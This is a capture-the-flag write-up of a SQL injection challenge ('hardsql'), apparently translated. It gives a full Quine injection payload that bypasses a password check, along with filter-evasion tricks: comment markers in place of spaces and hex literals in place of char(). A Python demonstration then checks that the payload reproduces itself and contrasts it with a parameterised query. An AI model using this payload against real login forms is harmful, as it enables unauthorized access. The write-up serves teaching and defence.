[NISACTF 2022]hardsql
Opening the challenge shows a login form. Injection testing finds that spaces are filtered; /**/ can be used in their place.
According to the challenge description, the query is:
$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
This turns out to be a Quine injection: the value we submit must come back out of the query unchanged, so the injected SELECT has to produce a string identical to the input.
(How to construct a Quine-injection payload is explained in detail in the blog post Quine-[第五空间 2021]yet_another_mysql_injection, qq_74426248's blog on CSDN.)
Construct the payload:
'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#',char(34),char(39)),char(66),'"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#')#
The page responds with: waf here
Guess that char is filtered.
char and chr are equivalent.
// Reconstructing the payload
// payload: '/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#',char(34),char(39)),char(66),'"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#')#
In hardsql the char function is banned; it can be bypassed with hexadecimal string literals, which MySQL treats as the same characters:
char(34) --> 0x22
char(39) --> 0x27
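To make the "quine" mechanism concrete, here is an added Python example (not part of the original writeup and not the challenge's own code). It models MySQL's REPLACE with str.replace, checks that the writeup's payload really reproduces itself through the two nested replace calls, shows the concatenated query the database would receive, and contrasts it with a parameterised lookup in which the same input is just an unmatched password. The SQLite table, the stored password 'example-secret', and the function names are constructed for the demonstration.

```python
import sqlite3

# The challenge query as quoted in the writeup, built by string concatenation.
# This is the vulnerable pattern: the submitted password becomes part of the SQL text.
def vulnerable_query(password):
    return ("SELECT passwd FROM users WHERE username='bilala' "
            "and passwd='" + password + "';")


# Payload copied verbatim from the writeup. After the leading quote closes the
# passwd literal, the rest is: union select replace(replace(SEED, ", '), B, SEED)#
PAYLOAD = """'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#',char(34),char(39)),char(66),'"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#')#"""

# The "seed": the single-quoted literal that appears twice inside the payload.
# Its content uses double quotes and the letter B as placeholders so that two
# REPLACE calls can turn it back into the full payload.
SEED = '"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#'


def mysql_replace(s, old, new):
    """Model of MySQL REPLACE(str, from_str, to_str): case-sensitive and replaces
    every occurrence, which is exactly what str.replace does."""
    return s.replace(old, new)


def quine_expand(seed):
    """Evaluate replace(replace(seed, char(34), char(39)), char(66), seed), the
    expression the injected UNION SELECT asks the database to compute.
    char(34) is '"', char(39) is "'", char(66) is 'B'; the writeup's hex
    spellings 0x22 and 0x27 name the same two characters."""
    step1 = mysql_replace(seed, chr(34), chr(39))  # every " becomes '
    return mysql_replace(step1, chr(66), seed)     # both B slots receive the seed


def payload_reproduces_itself():
    """The property the login check relies on: the WHERE clause matches no row,
    the UNION'd SELECT returns quine_expand(SEED), and the application then
    compares that value with the submitted password. They are identical."""
    return quine_expand(SEED) == PAYLOAD


def make_db():
    """Constructed fixture: in-memory users table with a made-up password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, passwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('bilala', 'example-secret')")
    return conn


def login_safe(conn, username, password):
    """Hardened form: bound parameters. The driver never parses the value as
    SQL, so the payload's quotes, comments and UNION are just characters in a
    password that does not match anything."""
    row = conn.execute(
        "SELECT passwd FROM users WHERE username=? AND passwd=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    print("query the database receives:\n ", vulnerable_query(PAYLOAD))
    print("payload reproduces itself:", payload_reproduces_itself())
    conn = make_db()
    print("parameterised login with payload:", login_safe(conn, "bilala", PAYLOAD))
    print("parameterised login with real password:",
          login_safe(conn, "bilala", "example-secret"))
```

The interesting line is the one in quine_expand: the seed contains no single quotes at all, so it survives being wrapped in a single-quoted literal, and the two REPLACE calls reintroduce the quotes and the second copy of the seed. That is also why the filter on char matters only for spelling, not for the idea: any way of naming the characters " and ' inside the expression (char(), hex literals) gives the same result, and the only robust defence is to stop the value from being parsed as SQL in the first place, as login_safe does.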